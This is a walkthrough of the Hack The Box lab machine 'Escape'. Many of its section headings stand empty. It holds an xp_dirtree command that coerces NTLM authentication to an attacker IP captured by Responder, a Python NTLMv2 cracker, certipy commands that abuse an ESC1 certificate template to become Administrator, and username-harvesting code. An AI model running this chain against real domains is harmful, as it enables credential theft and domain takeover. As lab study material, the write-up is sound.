Escape HTB Walkthrough

Oct 5, 2024    #box   #htb   #medium   #windows   #ldap   #mssql   #mysql   #ca   #certificate   #esc1  

Escape Hack The Box Walkthrough/Writeup:

How I use variables & wordlists:

1. Enumeration:

NMAP:

LDAP 389:

DNS 53:

Using dnsenum to enumerate DNS records:

Kerberos 88:

Using Kerbrute to bruteforce Usernames:

SMB 445:

Using netexec to check for null & guest session on SMB:

Overview of the IPC$ Share:

Connecting to the Public SMB Share using smbclient:

Attempting to extract creator names from the .PDF:

If you are not aware, it is sometimes possible to extract valid domain usernames from PDFs that were created on a Windows host, because the Author/Creator metadata is often populated with the logged-in Windows user's name. Note that exiftool reports a "Creator" tag both for the Info-dictionary /Creator entry (usually the application) and for the XMP dc:creator entry (usually the author), so check both.
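As an added worked example (not code from the original post), here is a small Python script that pulls the Author, Creator and Producer entries out of a PDF's Info dictionary and the dc:creator entry out of its XMP packet, then turns anything that looks like a person's name into the username formats worth feeding to Kerbrute. The PDF bytes, the name "Ryan Cooper" in the metadata and the username formats are constructed assumptions for the demo; the PDF parsing is a deliberately minimal regex pass over the raw file rather than a full PDF parser.

```python
import re

# Constructed sample: a minimal PDF-like byte string with an Info dictionary and an
# XMP packet, the two places a user name ends up. Not a file from the box.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Title (SQL Server Procedures) /Author (Ryan Cooper) "
    b"/Creator (Microsoft\\256 Word 2016) /Producer (Microsoft\\256 Word 2016) >>\nendobj\n"
    b"2 0 obj\n<< /Type /Metadata /Subtype /XML >>\nstream\n"
    b"<x:xmpmeta xmlns:x='adobe:ns:meta/'><rdf:RDF><rdf:Description>"
    b"<dc:creator><rdf:Seq><rdf:li>Ryan Cooper</rdf:li></rdf:Seq></dc:creator>"
    b"<xmp:CreatorTool>Microsoft Word</xmp:CreatorTool>"
    b"</rdf:Description></rdf:RDF></x:xmpmeta>\nendstream\nendobj\n"
    b"trailer\n<< /Info 1 0 R >>\n%%EOF\n"
)

INFO_KEYS = (b"Author", b"Creator", b"Producer")
# Words that mark an application rather than a person in Creator/Producer strings.
APP_WORDS = ("microsoft", "word", "excel", "powerpoint", "adobe", "acrobat",
             "libreoffice", "office", "pdf", "print", "writer", "ghostscript")


def _decode_pdf_string(raw: bytes) -> str:
    """Resolve PDF literal-string escapes: \\( \\) \\\\ and \\ddd octal (e.g. \\256 = ®)."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i] == 0x5C and i + 1 < len(raw):          # backslash escape
            j = i + 1
            while j < len(raw) and j < i + 4 and 0x30 <= raw[j] <= 0x37:
                j += 1
            if j > i + 1:                                # octal escape
                out.append(int(raw[i + 1:j], 8) & 0xFF)
                i = j
            else:                                        # escaped single character
                out.append(raw[i + 1])
                i += 2
            continue
        out.append(raw[i])
        i += 1
    return out.decode("latin-1")


def extract_metadata(pdf: bytes) -> dict:
    """Return Info-dictionary Author/Creator/Producer strings plus XMP dc:creator entries."""
    found = {}
    for key in INFO_KEYS:
        m = re.search(rb"/" + key + rb"\s*\(((?:\\.|[^\\)])*)\)", pdf)
        if m:
            found[key.decode()] = _decode_pdf_string(m.group(1))
    creators = []
    for block in re.findall(rb"<dc:creator>(.*?)</dc:creator>", pdf, re.S):
        creators += [li.decode("utf-8", "replace").strip()
                     for li in re.findall(rb"<rdf:li[^>]*>(.*?)</rdf:li>", block, re.S)]
    if creators:
        found["dc:creator"] = creators
    return found


def looks_like_person(value: str) -> bool:
    """Heuristic: two or three alphabetic tokens and no application keywords."""
    tokens = value.replace("\u00ae", " ").split()
    return (2 <= len(tokens) <= 3
            and all(t.isalpha() for t in tokens)
            and not any(w in value.lower() for w in APP_WORDS))


def username_formats(full_name: str) -> set:
    """Common AD sAMAccountName conventions for a 'First Last' name (assumed set)."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]
    return {f"{first}.{last}", f"{first}{last}", f"{first[0]}{last}", f"{first[0]}.{last}",
            f"{first}.{last[0]}", f"{last}.{first}", f"{last}{first[0]}"}


def candidate_usernames(pdf: bytes) -> list:
    """Sorted Kerbrute-ready username list derived from every person-looking metadata value."""
    people = set()
    for value in extract_metadata(pdf).values():
        for v in (value if isinstance(value, list) else [value]):
            if looks_like_person(v):
                people.add(v)
    usernames = set()
    for name in people:
        usernames |= username_formats(name)
    return sorted(usernames)


if __name__ == "__main__":
    print(extract_metadata(SAMPLE_PDF))
    print("\n".join(candidate_usernames(SAMPLE_PDF)))
```

Write the output to a file and feed it to kerbrute userenum; a real PDF's metadata can be in a compressed object stream, in which case exiftool (or a proper PDF library) is the right tool and this regex pass will find nothing.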

Attempting to extract Usernames From the PDF using exiftool:

Finding Hard-Coded MSSQL Creds in the SQL Server Procedures PDF:

Finding Usernames within the PDF:

Cred Stuffing & Meaning of “Guest” in the SMB Responses in netexec:

MSSQL 1433:

Cred stuffing the MSSQL Instance:

2. Foothold:

Connecting to the MSSQL Instance using impacket-mssqlclient:

Enumerating the MSSQL Instance:

Capturing the MSSQL System Admin hash using Responder & xp_dirtree:

  1. I start Responder:

    • sudo responder -v -I tun0
  2. I use xp_dirtree to make the SQL Server connect back to my malicious SMB server:

    • exec master..xp_dirtree '\\10.10.14.38\share\'
      • This is just \\<MY_KALI_IP>\<FAKE_SHARE>
  3. Hash caught:

    • This works because xp_dirtree makes the SQL Server service account open the UNC path, which means it authenticates to our malicious SMB server with NTLM, and Responder captures the NTLMv2 challenge/response:

Overview of xp_dirtree:

Cracking the MSSQL System Admin hash using Hashcat:
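An added example, not code from the original post, showing what the xp_dirtree trick above actually hands to Responder and what Hashcat mode 5600 then does with it. The MD4 is implemented by hand because hashlib's md4 is frequently unavailable under OpenSSL 3. The account name sql_svc and domain sequel are from the box; the password, server challenge and NTLMv2 blob bytes are invented so that the demo is self-contained (the real hash is not reproduced).

```python
import hmac
import struct

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often unavailable under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                           # round 1: F, words in order
            a = rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3: H, bit-reversed word order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password."""
    return _md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed by NTOWFv2 over (ServerChallenge || blob)."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def hashcat_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The line Responder logs, which is also Hashcat mode 5600's input format."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(line: str, wordlist):
    """Recompute NTProofStr for each candidate password, exactly as Hashcat 5600 does."""
    user, _, domain, challenge, proof, blob = line.split(":")
    target, challenge_b, blob_b = bytes.fromhex(proof), bytes.fromhex(challenge), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge_b, blob_b), target):
            return candidate
    return None


# Constructed capture: sql_svc/sequel are the box's account and domain, but the password,
# server challenge and NTLMv2 blob below are invented so the demo is self-contained.
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD = "sql_svc", "sequel", "Winter2024!"
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (
    bytes.fromhex("0101000000000000")                          # blob header + reserved
    + bytes.fromhex("00d0c2f3e8d5da01")                        # timestamp (FILETIME, LE)
    + bytes.fromhex("0a0b0c0d0e0f1011")                        # client challenge
    + bytes(4)                                                 # reserved
    + bytes.fromhex("02000c00") + "SEQUEL".encode("utf-16le")  # AV_PAIR: NetBIOS domain
    + bytes(4)                                                 # AV_PAIR terminator (MsvAvEOL)
)


def build_sample_line() -> str:
    """What Responder would write for the constructed capture above."""
    proof = ntlmv2_proof(SAMPLE_PASSWORD, SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, SAMPLE_BLOB)
    return hashcat_line(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_CHALLENGE, proof, SAMPLE_BLOB)


if __name__ == "__main__":
    line = build_sample_line()
    print(line)
    print("cracked:", crack_ntlmv2(line, ["password", "Summer2023", "Winter2024!"]))
```

In practice you paste the captured line into a file and run hashcat -m 5600 hash.txt rockyou.txt; the point of the pure-Python version is to make clear that the captured value is a keyed MAC over a challenge, not a reusable password hash, which is why NTLMv2 captures can be cracked offline but not passed-the-hash.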

Enumerating SMB as sql_svc user:

SYSVOL Share:

Running bloodhound.py:

Connecting to the MSSQL as sql_svc:

Finding a linked SQL Instance:

Enumerating the Host Using xp_dirtree:

Downloading ERRORLOG.BAK & why it’s important to re-check your tools:

Reading ERRORLOG.BAK & finding credentials for Ryan.Cooper:

3. Privilege Escalation:

Enumerating the host as Ryan.Cooper:

Automated Enumeration:

Stored Credentials Enumeration:

User Enumeration:

Basic System Enumeration:

Installed Program Enumeration:

Path Enumeration:

Drive Enumeration:

Scheduled Task Enumeration:

Powershell History Enumeration:

Network Enumeration:

Service/Process Enumeration:

Enumerating the password policy:

Enumerating whether the DC is vulnerable to any certificate privilege escalation techniques:

Using ESC1 Attack Chain to elevate privileges to Administrator:

  1. I retrieve the certificate template name from the file:

  2. I sync my clock:

    • sudo ntpdate -s sequel.htb
      • +Note+:
        • If you see the below error this is most likely down to your attack host clock being too out of sync with the target. (Picture taken from a previous box where I learned the hard way)
  3. I request a cert:

    • certipy-ad req -username $user@$domain -password $pass -ca sequel-DC-CA -target ca.$domain -template UserAuthentication -upn administrator@$domain -dns dc.$domain
      • +Note+: We use the name of the certificate template found in step 1, UserAuthentication, and supply the Administrator's UPN as the subject alternative name.
      • +!!!SUCCESS!!!+
  4. I use the certificate to authenticate as the Administrator and retrieve the Administrator NT hash, with a TGT stored in a .ccache:

    • certipy-ad auth -pfx administrator_dc.pfx -dc-ip $box
    • We now have both the Administrator NT hash and a Kerberos TGT saved in a .ccache file, which we can use for Kerberos authentication.
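An added example (not code from the original post, and not certipy's own source) covering the enumeration step above and the reason the chain works: the conditions that make a template ESC1, checked in Python over a constructed template inventory. The attribute and flag names are the real LDAP ones from the certificate-template schema (msPKI-Certificate-Name-Flag bit 0x1 = enrollee supplies subject, msPKI-Enrollment-Flag bit 0x2 = manager approval, msPKI-RA-Signature, pKIExtendedKeyUsage); the "enroll" list is an assumed pre-resolved view of the template's security descriptor, the published set stands in for the CA's certificateTemplates attribute, and the attribute values are modelled on what certipy find prints rather than taken from the box's LDAP.

```python
# Flag bits from the certificate-template schema (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # in msPKI-Enrollment-Flag: manager approval

# EKUs that make a certificate usable for AD logon (the set Certipy treats as client auth).
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_failures(template: dict, published: set) -> list:
    """Return the ESC1 conditions this template does NOT meet (an empty list means ESC1)."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    conditions = {
        "published on a CA": template["name"] in published,
        "enrollee supplies subject": bool(template.get("msPKI-Certificate-Name-Flag", 0)
                                          & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "client-auth EKU (or no EKU)": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "low-priv enrollment rights": bool(set(template.get("enroll", [])) & LOW_PRIV),
    }
    return [name for name, ok in conditions.items() if not ok]


def find_esc1(templates: list, published: set) -> list:
    """Names of templates that meet every ESC1 condition."""
    return [t["name"] for t in templates if not esc1_failures(t, published)]


# Constructed inventory (assumed values, not the box's real LDAP data).
USER_EKUS = ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"]
PUBLISHED = {"UserAuthentication", "User", "ApprovedClientAuth"}
TEMPLATES = [
    # What an ESC1 template looks like: subject from the request, client auth, Domain Users can enroll.
    {"name": "UserAuthentication", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": USER_EKUS, "enroll": ["Domain Users", "Domain Admins"]},
    # The stock User template: subject built from AD (0xA6000000), so the UPN cannot be chosen.
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": USER_EKUS, "enroll": ["Domain Users"]},
    # Same as the first, but a CA manager must approve each request.
    {"name": "ApprovedClientAuth", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": USER_EKUS, "enroll": ["Domain Users"]},
    # Same as the first, but not published on any CA, so nobody can request it.
    {"name": "Unpublished", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": USER_EKUS, "enroll": ["Domain Users"]},
]

if __name__ == "__main__":
    for t in TEMPLATES:
        failures = esc1_failures(t, PUBLISHED)
        print(f"{t['name']}: {'ESC1' if not failures else 'not ESC1: ' + ', '.join(failures)}")
```

This is the same set of conditions certipy find -vulnerable reports as ESC1; the "enrollee supplies subject" bit is what lets the -upn administrator@$domain from the req step land in the certificate's SAN, and clearing that bit (or requiring manager approval) is the fix. One caveat for patched targets: since the KB5014754 changes, a DC in full enforcement mode rejects PKINIT with a certificate that lacks the SID security extension, so the auth step can fail on hardened domains even when the template still looks ESC1 on paper.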

Attack Deep-Dive, e.g. Exploiting UPNs in ESC1 Attacks: A Hacker's Guide:

4. Ownership:

Dumping NTDS.dit database:

Loading .ccache into the KRB5CCNAME Variable to Authenticate:

Lessons Learned:

What did I learn?

  1. I hadn’t actually used the ESC1 attack vector before, only ESC7 in https://bloodstiller.com/walkthroughs/manager-box/ , so it was cool to do that.
  2. I learned about netexec displaying guest when a random username and password is supplied as a way to show that guest logon is accepted on the target.
  3. I learned to always re-check my tools. That mistake with evil-winrm was silly.

What silly mistakes did I make?

  1. See point 3 above.
  2. Oh I also tried to use the wrong certificate name when initially doing the exploit, copy & paste always!

Sign off:

Remember, folks as always: with great power comes great pwnage. Use this knowledge wisely, and always stay on the right side of the law!

Until next time, hack the planet!

– Bloodstiller

– Get in touch bloodstiller at proton dot me


